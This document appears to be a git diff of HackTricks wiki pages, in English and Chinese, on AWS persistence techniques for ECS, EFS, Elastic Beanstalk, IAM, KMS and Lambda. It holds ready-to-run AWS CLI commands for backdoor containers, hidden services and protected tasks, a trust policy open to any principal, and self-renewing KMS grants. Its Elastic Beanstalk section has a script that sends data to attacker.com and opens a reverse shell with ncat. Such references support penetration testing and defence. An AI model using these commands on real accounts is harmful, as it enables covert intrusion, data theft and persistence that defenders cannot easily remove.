"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'
```
### Backdoor Container in Existing ECS Task Definition
> [!NOTE]
> TODO: Test
An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'
```
### Undocumented ECS Service
> [!NOTE]
> TODO: Test
An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,152 +0,0 @@
# AWS - ECS 持久化
{{#include ../../../../banners/hacktricks-training.md}}
## ECS
更多信息请查看:
{{#ref}}
../../aws-services/aws-ecs-enum.md
{{#endref}}
### 隐藏的周期性 ECS 任务
> [!NOTE]
> TODO: 测试
攻击者可以使用 Amazon EventBridge 创建一个隐藏的周期性 ECS 任务,以 **定期安排恶意任务的执行**。该任务可以执行 reconnaissance、exfiltrate data或在 AWS 账户中维持持久性。
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)"
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
{
"Id": "malicious-ecs-task-target",
"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
"EcsParameters": {
"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
"TaskCount": 1
}
}
]'
```
### Backdoor Container 在现有 ECS task definition 中
> [!NOTE]
> 待办:测试
攻击者可以在现有的 ECS task definition 中添加一个 **stealthy backdoor container**,与合法容器并行运行。该 backdoor container 可用于持久化并执行恶意活动。
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
{
"name": "legitimate-container",
"image": "legitimate-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
},
{
"name": "backdoor-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": false
}
]'
```
### 未记录的 ECS 服务
> [!NOTE]
> 待办:测试
攻击者可以创建一个 **未记录的 ECS 服务** 来运行恶意任务。通过将期望的任务数设置为最小并禁用日志记录,管理员就更难注意到该恶意服务。
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
{
"name": "malicious-container",
"image": "malicious-image:latest",
"memory": 256,
"cpu": 10,
"essential": true
}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
### ECS Persistence via Task Scale-In Protection (UpdateTaskProtection)
滥用 ecs:UpdateTaskProtection 来防止服务任务被 scalein 事件和滚动部署停止。通过持续延长保护,攻击者可以保持长期运行的任务(用于 C2 或数据收集),即使防御方减少 desiredCount 或推送新的任务修订。
在 us-east-1 重现的步骤:
```bash
# 1) Cluster (create if missing)
CLUSTER=$(aws ecs list-clusters --query 'clusterArns[0]' --output text 2>/dev/null)
[ -z "$CLUSTER" -o "$CLUSTER" = "None" ] && CLUSTER=$(aws ecs create-cluster --cluster-name ht-ecs-persist --query 'cluster.clusterArn' --output text)
# 2) Minimal backdoor task that just sleeps (Fargate/awsvpc)
cat > /tmp/ht-persist-td.json << 'JSON'
{
"family": "ht-persist",
"networkMode": "awsvpc",
"requiresCompatibilities": ["FARGATE"],
"cpu": "256",
"memory": "512",
"containerDefinitions": [
{"name": "idle","image": "public.ecr.aws/amazonlinux/amazonlinux:latest",
"command": ["/bin/sh","-c","sleep 864000"]}
]
}
JSON
aws ecs register-task-definition --cli-input-json file:///tmp/ht-persist-td.json >/dev/null
# 3) Create service (use default VPC public subnet + default SG)
VPC=$(aws ec2 describe-vpcs --filters Name=isDefault,Values=true --query 'Vpcs[0].VpcId' --output text)
SUBNET=$(aws ec2 describe-subnets --filters Name=vpc-id,Values=$VPC Name=map-public-ip-on-launch,Values=true --query 'Subnets[0].SubnetId' --output text)
SG=$(aws ec2 describe-security-groups --filters Name=vpc-id,Values=$VPC Name=group-name,Values=default --query 'SecurityGroups[0].GroupId' --output text)
aws ecs create-service --cluster "$CLUSTER" --service-name ht-persist-svc \
--task-definition ht-persist --desired-count 1 --launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[$SUBNET],securityGroups=[$SG],assignPublicIp=ENABLED}"
# 4) Get running task ARN
TASK=$(aws ecs list-tasks --cluster "$CLUSTER" --service-name ht-persist-svc --desired-status RUNNING --query 'taskArns[0]' --output text)
# 5) Enable scale-in protection for 24h and verify
aws ecs update-task-protection --cluster "$CLUSTER" --tasks "$TASK" --protection-enabled --expires-in-minutes 1440
aws ecs get-task-protection --cluster "$CLUSTER" --tasks "$TASK"
# 6) Try to scale service to 0 (task should persist)
aws ecs update-service --cluster "$CLUSTER" --service ht-persist-svc --desired-count 0
aws ecs list-tasks --cluster "$CLUSTER" --service-name ht-persist-svc --desired-status RUNNING
# Optional: rolling deployment blocked by protection
aws ecs register-task-definition --cli-input-json file:///tmp/ht-persist-td.json >/dev/null
aws ecs update-service --cluster "$CLUSTER" --service ht-persist-svc --task-definition ht-persist --force-new-deployment
aws ecs describe-services --cluster "$CLUSTER" --services ht-persist-svc --query 'services[0].events[0]'
# 7) Cleanup
aws ecs update-task-protection --cluster "$CLUSTER" --tasks "$TASK" --no-protection-enabled || true
aws ecs update-service --cluster "$CLUSTER" --service ht-persist-svc --desired-count 0 || true
aws ecs delete-service --cluster "$CLUSTER" --service ht-persist-svc --force || true
aws ecs deregister-task-definition --task-definition ht-persist || true
```
影响:受保护的任务在 desiredCount=0 的情况下仍然保持 RUNNING并在新部署期间阻止替换从而在 ECS 服务内实现隐蔽的长期持久化。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,25 @@
# AWS - EFS Persistence
{{#include ../../../banners/hacktricks-training.md}}
## EFS
For more information check:
{{#ref}}
../aws-services/aws-efs-enum.md
{{#endref}}
### Modify Resource Policy / Security Groups
Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
### Create Access Point
You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,21 +0,0 @@
# AWS - EFS 持久化
{{#include ../../../../banners/hacktricks-training.md}}
## EFS
更多信息请查看:
{{#ref}}
../../aws-services/aws-efs-enum.md
{{#endref}}
### 修改 Resource Policy / Security Groups
通过修改 **resource policy 和/或 security groups**,你可以尝试将对文件系统的访问持久化。
### 创建 Access Point
你可以 **create an access point**(对 `/` 有 root 访问权限),并让其从你已实施 **其他持久化** 的服务可访问,以保持对文件系统的特权访问。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,81 @@
# AWS - Elastic Beanstalk Persistence
{{#include ../../../banners/hacktricks-training.md}}
## Elastic Beanstalk
For more information check:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
{{#endref}}
### Persistence in Instance
In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
### Backdoor in Version
An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
### New backdoored version
Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
### Abusing Custom Resource Lifecycle Hooks
> [!NOTE]
> TODO: Test
Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh
# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,75 +0,0 @@
# AWS - Elastic Beanstalk Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## Elastic Beanstalk
更多信息请参见:
{{#ref}}
../../aws-services/aws-elastic-beanstalk-enum.md
{{#endref}}
### 实例内持久化
为了在 AWS 账户内维持持久性,可以在实例内引入一些 **持久化机制**cron job, ssh key...),这样攻击者将能够访问实例并从 metadata service 窃取 IAM role **credentials**
### 版本中的 backdoor
攻击者可以在 S3 repo 中对代码植入 backdoor使其在执行预期代码的同时始终执行其 backdoor。
### 新的 backdoored 版本
攻击者可以不更改当前版本的代码,而部署一个新的 backdoored 应用版本。
### 滥用 Custom Resource Lifecycle Hooks
> [!NOTE]
> TODO: Test
Elastic Beanstalk 提供 lifecycle hooks允许在实例配置与终止期间运行自定义脚本。攻击者可以**配置一个 lifecycle hook定期执行脚本以 exfiltrates data 或维持对 AWS account 的访问**。
```bash
# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh
# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh
# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml
# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,53 @@
# AWS - IAM Persistence
{{#include ../../../banners/hacktricks-training.md}}
## IAM
For more information access:
{{#ref}}
../aws-services/aws-iam-enum.md
{{#endref}}
### Common IAM Persistence
- Create a user
- Add a controlled user to a privileged group
- Create access keys (of the new user or of all users)
- Grant extra permissions to controlled users/groups (attached policies or inline policies)
- Disable MFA / Add you own MFA device
- Create a Role Chain Juggling situation (more on this below in STS persistence)
### Backdoor Role Trust Policies
You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": ["*", "arn:aws:iam::123213123123:root"]
},
"Action": "sts:AssumeRole"
}
]
}
```
### Backdoor Policy Version
Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
### Backdoor / Create Identity Provider
If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,47 +0,0 @@
# AWS - IAM 持久化
{{#include ../../../../banners/hacktricks-training.md}}
## IAM
更多信息请查看:
{{#ref}}
../../aws-services/aws-iam-enum.md
{{#endref}}
### 常见的 IAM 持久化
- 创建用户
- 将受控用户添加到特权组
- 创建 access keys新用户的或所有用户的
- 授予受控用户/组额外权限attached policies 或 inline policies
- 禁用 MFA / 添加自己的 MFA 设备
- 创建 Role Chain Juggling 情况(在下面 STS persistence 中有更多说明)
### Backdoor Role Trust Policies
你可以 backdoor 一个 trust policy使你能够对由你控制的外部资源或对所有人执行 assume
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": ["*", "arn:aws:iam::123213123123:root"]
},
"Action": "sts:AssumeRole"
}
]
}
```
### Backdoor 策略版本
将管理员权限赋给某个不是最新版本的策略(最新版本应看起来合法),然后将该策略版本分配给受控的用户/组。
### Backdoor / 创建身份提供者
如果该账户已经信任某个常见的身份提供者(例如 Github则可以放宽该信任的条件从而让攻击者滥用它们。
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,43 @@
# AWS - KMS Persistence
{{#include ../../../banners/hacktricks-training.md}}
## KMS
For mor information check:
{{#ref}}
../aws-services/aws-kms-enum.md
{{#endref}}
### Grant acces via KMS policies
An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
### Eternal Grant
Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
--key-id <key-id> \
--grantee-principal <user_arn> \
--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id <key-id>
```
> [!NOTE]
> A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -1,37 +0,0 @@
# AWS - KMS Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## KMS
For mor information check:
{{#ref}}
../../aws-services/aws-kms-enum.md
{{#endref}}
### 通过 KMS policies 授予 Grant 访问权限
攻击者可以使用权限 **`kms:PutKeyPolicy`** 将密钥的访问权限授予他控制的用户,甚至授予外部账户。更多信息请查看 [**KMS Privesc page**](../../aws-privilege-escalation/aws-kms-privesc/README.md)。
### 永久 Grant
Grant 是另一种授予主体对特定密钥某些权限的方式。可以授予一个允许用户创建 grant 的 grant。此外用户可以在同一密钥上拥有多个 grant甚至是相同的 grant
因此,用户可能拥有 10 个具有全部权限的 grants。攻击者应持续监控这一点。如果在某个时刻移除了 1 个 grant那么应再生成另 10 个。
(我们使用 10 而不是 2以便在用户仍然拥有某些 grant 时能够检测到某个 grant 被移除)
```bash
# To generate grants, generate 10 like this one
aws kms create-grant \
--key-id <key-id> \
--grantee-principal <user_arn> \
--operations "CreateGrant" "Decrypt"
# To monitor grants
aws kms list-grants --key-id <key-id>
```
> [!NOTE]
> 一个 grant 只能授予来自此处列出的 permissions [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,133 +1,68 @@
# AWS - Lambda 持久性
# AWS - Lambda Persistence
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda
欲了解更多信息,请查看:
For more information check:
{{#ref}}
../../aws-services/aws-lambda-enum.md
{{#endref}}
### Lambda Layer 持久化
### Lambda Layer Persistence
可以**引入/backdoor 一个 layer 来在 Lambda 执行时以隐蔽方式执行任意代码**
It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
{{#ref}}
aws-lambda-layers-persistence.md
{{#endref}}
### Lambda Extension 持久化
### Lambda Extension Persistence
滥用 Lambda Layers 还可以滥用 extensions并在 Lambda 中实现持久化,同时窃取和修改请求。
Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
{{#ref}}
aws-abusing-lambda-extensions.md
{{#endref}}
### 通过 资源策略
### Via resource policies
可以将对不同 Lambda 操作(例如 invoke update code)的访问权限授予外部账户:
It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
<figure><img src="../../../../images/image (255).png" alt=""><figcaption></figcaption></figure>
### 版本、别名与权重
### Versions, Aliases & Weights
Lambda 可以有**不同的版本**(每个版本的代码可以不同)。\
然后,你可以为 Lambda 创建**不同的别名指向不同版本**,并为每个别名设置不同的权重。\
这样,攻击者可以创建一个**backdoored 的版本 1**和一个**仅包含合法代码的版本 2**,并仅在 1% 的请求中执行版本 1 来保持隐蔽。
A Lambda can have **different versions** (with different code each version).\
Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
<figure><img src="../../../../images/image (120).png" alt=""><figcaption></figcaption></figure>
### 版本 Backdoor + API Gateway
### Version Backdoor + API Gateway
1. 复制 Lambda 的原始代码
2. **创建一个 backdoored 的新版本**(在原始代码中植入后门或仅使用恶意代码)。发布并**将该版本部署**到 $LATEST
1. 调用与该 Lambda 相关的 API Gateway 来执行代码
3. **创建一个包含原始代码的新版本**,发布并将该**版本**部署到 $LATEST
1. 这会将带后门的代码隐藏在之前的版本中
4. 转到 API Gateway **创建一个新的 POST 方法**(或选择任何其他方法),该方法将执行带后门的 Lambda 版本: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
1. 注意 arn 末尾的 :1 **表示函数的版本**(在此场景中版本 1 将是被植入后门的版本)。
5. 选择已创建的 POST 方法,并在 Actions 中选择 **`Deploy API`**
6. 现在,当你**通过 POST 调用该函数时,你的 Backdoor** 将被触发
1. Copy the original code of the Lambda
2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
1. Call the API gateway related to the lambda to execute the code
3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
1. This will hide the backdoored code in a previous version
4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
5. Select the POST method created and in Actions select **`Deploy API`**
6. Now, when you **call the function via POST your Backdoor** will be invoked
### Cron/Event 触发器
### Cron/Event actuator
你可以在某些事件发生或时间到期时让 Lambda 函数运行,这使得 Lambda 成为实现持久性和规避检测的常用方法。\
下面是一些通过创建 Lambda 使你在 AWS 中更隐蔽的思路:
The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
- 每当创建新用户时Lambda 生成新的用户密钥并将其发送给攻击者。
- 每当创建新角色时Lambda 授予被攻陷用户 assume role 权限。
- 每当生成新的 CloudTrail 日志时,删除/篡改它们
- Every time a new user is created lambda generates a new user key and send it to the attacker.
- Every time a new role is created lambda gives assume role permissions to compromised users.
- Every time new cloudtrail logs are generated, delete/alter them
### RCE 滥用 AWS_LAMBDA_EXEC_WRAPPER + Lambda Layers
滥用环境变量 `AWS_LAMBDA_EXEC_WRAPPER`,在 runtime/handler 启动前执行攻击者控制的 wrapper 脚本。通过 Lambda Layer 将 wrapper 放在 `/opt/bin/htwrap`,设置 `AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap`,然后调用函数。该 wrapper 在函数运行时进程中运行,继承函数执行角色,并最终 `exec` 真正的 runtime以便原始 handler 正常执行。
{{#ref}}
aws-lambda-exec-wrapper-persistence.md
{{#endref}}
### AWS - Lambda Function URL 公开暴露
滥用 Lambda 的异步目标asynchronous destinations并配合 Recursion 配置,可以让函数在没有外部调度器(如 EventBridge、cron 等的情况下持续自我调用。默认情况下Lambda 会终止递归循环,但将 recursion 配置设置为 Allow 可重新启用它们。Destinations 在服务端交付用于异步调用,因此一次种子调用即可创建一个隐蔽、无代码的心跳/Backdoor 通道。可以选择使用 reserved concurrency 对调用速率进行限制以降低噪音。
{{#ref}}
aws-lambda-async-self-loop-persistence.md
{{#endref}}
### AWS - Lambda Alias-Scoped Resource Policy Backdoor
创建一个包含攻击者逻辑的隐藏 Lambda 版本,并使用 `lambda add-permission``--qualifier` 参数将基于资源的策略限定到该特定版本(或别名)。仅向攻击者主体授予 `lambda:InvokeFunction``arn:aws:lambda:REGION:ACCT:function:FN:VERSION` 的权限。通过函数名称或主别名的正常调用不会受影响,而攻击者可以直接调用带后门的版本 ARN。
这比暴露 Function URL 更隐蔽,并且不会更改主流量别名。
{{#ref}}
aws-lambda-alias-version-policy-backdoor.md
{{#endref}}
### 冻结 AWS Lambda 运行时
拥有 lambda:InvokeFunction、logs:FilterLogEvents、lambda:PutRuntimeManagementConfig 和 lambda:GetRuntimeManagementConfig 权限的攻击者可以修改函数的 runtime management configuration。当目标是将 Lambda 函数保持在易受攻击的运行时版本,或保持与可能与较新运行时不兼容的恶意 layers 的兼容性时,此攻击尤其有效。
攻击者通过修改 runtime management configuration 来固定运行时版本:
```bash
# Invoke the function to generate runtime logs
aws lambda invoke \
--function-name $TARGET_FN \
--payload '{}' \
--region us-east-1 /tmp/ping.json
sleep 5
# Freeze automatic runtime updates on function update
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on FunctionUpdate \
--region us-east-1
```
验证已应用的配置:
```bash
aws lambda get-runtime-management-config \
--function-name $TARGET_FN \
--region us-east-1
```
可选:固定到特定运行时版本
```bash
# Extract Runtime Version ARN from INIT_START logs
RUNTIME_ARN=$(aws logs filter-log-events \
--log-group-name /aws/lambda/$TARGET_FN \
--filter-pattern "INIT_START" \
--query 'events[0].message' \
--output text | grep -o 'Runtime Version ARN: [^,]*' | cut -d' ' -f4)
```
将运行时固定到特定版本:
```bash
aws lambda put-runtime-management-config \
--function-name $TARGET_FN \
--update-runtime-on Manual \
--runtime-version-arn $RUNTIME_ARN \
--region us-east-1
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@@ -1,42 +1,46 @@
# AWS - 滥用 Lambda 扩展
# AWS - Abusing Lambda Extensions
{{#include ../../../../banners/hacktricks-training.md}}
## Lambda 扩展
## Lambda Extensions
Lambda 扩展通过与各种 **监控、可观察性、安全性和治理工具** 集成来增强功能。这些扩展通过 [.zip 压缩包使用 Lambda ](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) 添加,或包含在 [容器镜像部署](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/) 中,以两种模式运行:**内部** 和 **外部**
Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
- **内部扩展** 与运行时进程合并,使用 **特定语言的环境变量** **包装脚本** 操作其启动。此自定义适用于多种运行时,包括 **Java Correto 8 11Node.js 10 和 12以及 .NET Core 3.1**
- **外部扩展** 作为单独的进程运行,与 Lambda 函数的生命周期保持操作一致。它们与多种运行时兼容,如 **Node.js 10 12Python 3.7 3.8Ruby 2.5 2.7Java Corretto 8 11.NET Core 3.1** 以及 **自定义运行时**
- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
有关 [**Lambda 扩展如何工作的更多信息,请查看文档**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html)
For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
### 持久性、窃取请求和修改请求的外部扩展
### External Extension for Persistence, Stealing Requests & modifying Requests
这是本文中提出的技术摘要:[https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
发现 Lambda 运行环境中的默认 Linux 内核是使用 “**process_vm_readv**” “**process_vm_writev**” 系统调用编译的。所有进程都以相同的用户 ID 运行,即使是为外部扩展创建的新进程。**这意味着外部扩展可以完全读写 Rapid 的堆内存,这是设计使然。**
It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process_vm_readv**” and “**process_vm_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapids heap memory, by design.**
此外,虽然 Lambda 扩展有能力 **订阅调用事件**,但 AWS 不会向这些扩展透露原始数据。这确保了 **扩展无法访问通过 HTTP 请求传输的敏感信息**
Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
Init (Rapid) 进程在 [http://127.0.0.1:9001](http://127.0.0.1:9001/) 监控所有 API 请求,而 Lambda 扩展在执行任何运行时代码之前初始化并运行,但在 Rapid 之后。
The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
<figure><img src="../../../../images/image (254).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png</a></p></figcaption></figure>
变量 **`AWS_LAMBDA_RUNTIME_API`** 指示 **IP** 地址和 **端口** 号,以便 **子运行时进程** 和其他扩展使用。
The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
> [!WARNING]
> 通过将 **`AWS_LAMBDA_RUNTIME_API`** 环境变量更改为我们可以访问的 **`port`**,可以拦截 Lambda 运行时内的所有操作(**中间人攻击**)。这是可能的,因为扩展与 Rapid Init 具有相同的权限,并且系统内核允许 **修改进程内存**,从而能够更改端口号。
> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
因为 **扩展在任何运行时代码之前运行**,修改环境变量将影响运行时进程(例如,PythonJavaNodeRuby)在启动时的行为。此外,**在我们之后加载的扩展**,依赖于此变量,也将通过我们的扩展进行路由。此设置可能使恶意软件完全绕过安全措施或直接在运行时环境中记录扩展。
Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
<figure><img src="../../../../images/image (267).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png</a></p></figcaption></figure>
